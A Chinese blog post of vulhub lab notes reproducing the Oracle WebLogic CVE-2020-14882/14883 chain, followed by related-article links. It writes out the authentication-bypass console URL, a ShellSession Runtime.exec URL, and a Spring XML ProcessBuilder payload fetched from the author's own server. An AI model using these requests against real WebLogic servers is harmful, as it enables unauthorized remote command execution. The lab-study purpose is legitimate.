vulhub漏洞—Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

最新推荐文章于 2024-09-29 10:04:46 发布
最新推荐文章于 2024-09-29 10:04:46 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 网络安全 vulhub 学习笔记 文章标签: 安全 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808483/article/details/122038724
版权
学习笔记 同时被 3 个专栏收录
38 篇文章 8 订阅
订阅专栏
网络安全
33 篇文章 7 订阅
订阅专栏
vulhub
12 篇文章 1 订阅
订阅专栏

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

漏洞环境

vulhub : https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md

执行如下命令启动一个Weblogic 12.2.1.3版本的服务器:

docker-compose up -d

启动完成后,访问http://your-ip:7001/console即可查看到后台登录页面。

image-20211220114504452

漏洞复现

首先通过CVE-2020-14882的权限绕过漏洞,未授权访问后台管理页面,通过以下URL访问

http://ip:7001/console/css/%252e%252e%252fconsole.portal

image-20211220114843815

然后通过CVE-2020-14883来执行任意代码执行

CVE-2020-14883有两种利用方法一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

方法一:

com.tangosol.coherence.mvel2.sh.ShellSession方法直接访问以下构造的URL即可利用

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/EDI');")

image-20211220120421513

进入docker容器就会发现创建的文件~,这里靶机是同学搭的就不再放截图了~

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

方法二:

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext方法通用所有

我们需要构建一个xml文件,将其保存在weblogic能访问的服务器上:ip(这里使用的是我自己的服务器):8000/test.xml:

test.xml

<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[touch /tmp/success2]]></value> </list> </constructor-arg> </bean> </beans>

通过python3 -m http.server命令放到外网环境中,默认监听端口8000。

python3 -m http.server

image-20211220121525132

image-20211220122558429

构造URL即可利用

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://ip:8000/test.xml")

image-20211220122413890

同样进入容器,就可以看到创建的文件夹!

ErYao7
关注
专栏目录
WebLogic LDAP远程代码执行漏洞CVE-2021-2109)
千寻的博客
02-11 4402
漏洞名称 WebLogic LDAP远程代码执行漏洞 漏洞编号 CVE-2021-2109 JNDI简介 JNDI是Java Naming and Directory Interface (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API (application programing interface,应用程序编程接口)。 漏洞描述 2020年11月19日,阿里云安全向Oracle官方报告了Weblogic Server远程代码执行漏洞
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 授权访问漏洞复现
qq_51577576的博客
09-03 1653
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
weblogic管理控制台授权远程命令执行漏洞
weixin_45911307的博客
04-12 4250
Weblogic 默认端口号:7001 (1)weblogic管理控制台授权远程命令执行漏洞 CVE-2020-14882 1,拉取环境 2,访问网站 3,启动完成后,访问http://your-ip:7001/console查看管理控制台登录页面 4,使用此 URL 绕过 Console 组件的身份验证: http://your-ip:7001/console/css/%252e%252e%252fconsole.portal 5, 访问以下 URL 以链接 2 个
Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1767
Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现
vulhub weblogic 靶场攻略
最新发布
shw_yzh的博客
09-29 1346
通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell。
WeblogicCVE-2020-14882CVE-2020-14883管理控制台授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6243
WeblogicCVE-2020-14882CVE-2020-14883管理控制台授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
weblogic管理控制台授权远程命令执行漏洞weblogic SSRF漏洞复现
weixin_48739941的博客
04-21 1557
1 weblogic管理控制台授权远程命令执行漏洞复现 (1)cd CVE-2020-14882 切换目录。 (2)docker-compose up -d 启动。 (3)访问http://192.168.241.128:7001/console (4)http://192.168.241.128:7001/css/%252e%252e%252fconsole.portal绕过漏洞授权访问后台管理页面。 (5)burpsuite抓包。 (6)send to repe..
19 - vulhub - docker daemon api 授权访问漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1685
Docker是一款国内外云平台常用的应用程序轻量级容器,AWS,百度等都有使用。通常用于轻量化部署应用。 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883漏洞复现
weixin_48413667的博客
09-22 8122
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警
07-19
CVE-2018-2893是Oracle WebLogic Server的一个严重安全漏洞,其危害在于攻击者无需授权即可远程执行任意代码。对于使用受影响版本的组织,及时更新补丁和加强网络访问控制是至关重要的。同时,保持JDK的更新状态也是...
vulhub-weblogic
qq_38618396的博客
01-03 1021
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个
vulhubWeblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882漏洞复现
qq_45300786的博客
04-10 433
https://www.cnblogs.com/backlion/p/13951858.html
vulhubCVE-2020-14882 WebLogic远程代码执行漏洞
weixin_42884199的博客
12-09 2210
前言 远程代码执行漏洞CVE-2020-14882)POC 已被公开,经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。 一、启动靶机 在这里插入代码片 在这里插入代码片 二、漏洞利用 靶机搭建成功 http://192.168.150.146:7001/console/login/LoginForm.j
vulhub weblogic CVE-2017-10271
weixin_37639863的博客
02-19 3746
vulhubWeblogicCVE-2017-10271)漏洞复现_樱浅沐冰的博客-CSDN博客_vulhub weblogic漏洞复现背景介绍Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。启动vulhub里的weblogic服务漏洞存在于以下路径:http://192.168.100.23:7001//wls-wsat/CoordinatorPortType
CVE-2020-14882vulhub weblogic漏洞复现】
weixin_65722679的博客
07-04 330
CVE-2020-14882vulhub weblogic漏洞复现】
redis授权访问漏洞vulhub靶场】复现
m0_55854679的博客
08-01 998
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
vulhubWeblogic_SSRF(CVE-2014-4210)漏洞复现
qq_45300786的博客
04-12 337
这个真的不知道怎么回事,就是不能反弹shell,可能是我没有redis吧 还是直接放参考链接吧 https://github.com/vulhub/vulhub/blob/master/weblogic/ssrf/README.md https://blog.csdn.net/LTtiandd/article/details/99592832 https://dyblogs.cn/dy/2275.html ...
vulhubWeblogic 管理控制台授权远程命令执行漏洞复现(CVE-2020-14882CVE-2020-14883
yougexiaojiuguan的博客
03-10 780
漏洞复现过程的记录
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得授权远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ErYao7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值